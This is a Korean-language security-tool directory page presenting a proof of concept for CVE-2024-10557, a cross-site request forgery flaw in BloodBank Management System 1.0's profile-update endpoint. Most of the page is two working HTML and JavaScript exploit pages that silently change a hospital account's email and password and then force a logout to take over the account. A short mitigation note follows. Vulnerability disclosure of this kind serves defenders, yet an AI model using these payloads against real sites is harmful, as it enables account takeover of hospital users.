Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-10557 — 병원 프로필 업데이트를 통해 계정 탈취로 이어지는 CSRF POC | Kitploit
도구/GitHubGitHub/bevennyamande/cve-2024-10557
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubbevennyamande/cve-2024-10557

CVE-2024-10557

병원 프로필 업데이트를 통해 계정 탈취로 이어지는 CSRF POC

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

영향받는 버전:

  • BloodBank Management System: 1.0

취약점 정보:

  • 취약점 유형: 사이트 간 요청 위조 (CSRF)
  • 심각도: 높음
  • 상태: 패치되지 않음

취약한 엔드포인트:

  • 경로: /file/updateprofile.php

취약점 설명:

이 엔드포인트 /file/updateprofile.php에 CSRF 취약점이 존재합니다. 원격 사용자가 병원의 사용자 세부 정보를 업데이트할 수 있으며, 공격자가 이메일부터 비밀번호까지 모든 정보를 업데이트할 수 있어 계정 탈취 가능성이 높아집니다.

성공적으로 악용될 경우 피해자를 대신하여 무단 조치(예: 데이터 삭제) 가 발생할 수 있습니다. 또한 악성 웹사이트를 방문하여 페이로드를 통해 악용될 수 있습니다.


개념 증명 (PoC):

다음은 로그인된 병원 계정의 프로필 세부 정보를 업데이트하는 CSRF POC 공격의 예시입니다. 공격자가 제어하는 도메인(제 경우 localhost를 사용)에 파일을 호스팅하십시오:

root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC with Logout Redirect</title>
</head>
<body>
    <h2>CSRF Proof of Concept with Chained Logout</h2>

    <!-- Form to exploit CSRF vulnerability for updating profile -->
    <form id="csrfForm" action="http://localhost.local/bloodbank/file/updateprofile.php" method="POST">
        <input type="hidden" name="hname" value="parirenyatwa">
        <input type="hidden" name="hemail" value="[email protected]">
        <input type="hidden" name="hpassword" value="pari1234">
        <input type="hidden" name="hphone" value="0777054000">
        <input type="hidden" name="hcity" value="harare">
        <input type="hidden" name="update" value="Update">
    </form>

    <script>
        // Submit the CSRF form to update profile
        document.getElementById("csrfForm").submit();
   </script>
</body>
</html>



계정 탈취를 위한 개념 증명 (PoC)

  • 공격자는 이메일과 비밀번호를 조작하여 프로필 세부 정보를 효과적으로 업데이트하고, 로그아웃 CSRF를 강제하여 계정 탈취를 달성할 수 있습니다.
root@kitploit:~

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF PoC with XMLHttpRequest</title>
</head>
<body>
    <h2>CSRF Proof of Concept with XMLHttpRequest and Redirect</h2>

    <script>
        // Define the target URLs for the CSRF attack
        const updateUrl = "http://localhost.local/bloodbank/file/updateprofile.php";
        const logoutUrl = "http://localhost.local/bloodbank/logout.php";

        // Data for the profile update CSRF request
        const updateData = "hname=parirenyatwa&hemail=pari%40hospital.co.zw&hpassword=pari1234&hphone=0777054000&hcity=harare&update=Update";

        // Function to send the XMLHttpRequest
        function sendCSRFUpdate() {
            const xhr = new XMLHttpRequest();
            xhr.open("POST", updateUrl, true);
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

            // When the request is complete, redirect to the logout page
            xhr.onload = function() {
                if (xhr.status === 200) {
                    console.log("Profile update CSRF request completed");
                    // Redirect to logout URL to log the victim out
                    window.location.href = logoutUrl;
                } else {
                    console.error("Profile update failed with status:", xhr.status);
                }
            };

            // Send the request with the update data
            xhr.send(updateData);
        }

        // Trigger the CSRF attack by sending the update request
        sendCSRFUpdate();
    </script>
</body>
</html>




영향:

  • 데이터 조작: 공격자가 사용자에게 표시되는 콘텐츠를 수정할 수 있습니다.
  • 평판 손상: 악의적인 행동으로 인해 사용자가 시스템에 대한 신뢰를 잃을 수 있습니다.

완화 권장 사항:

  1. CSRF 토큰 사용 크로스 도메인 접근을 방지하는 메커니즘을 구현하거나 요청에 CSRF 토큰을 포함하고, 상태 변경 작업에 GET 요청을 사용하지 않도록 하십시오.
도구 다운로드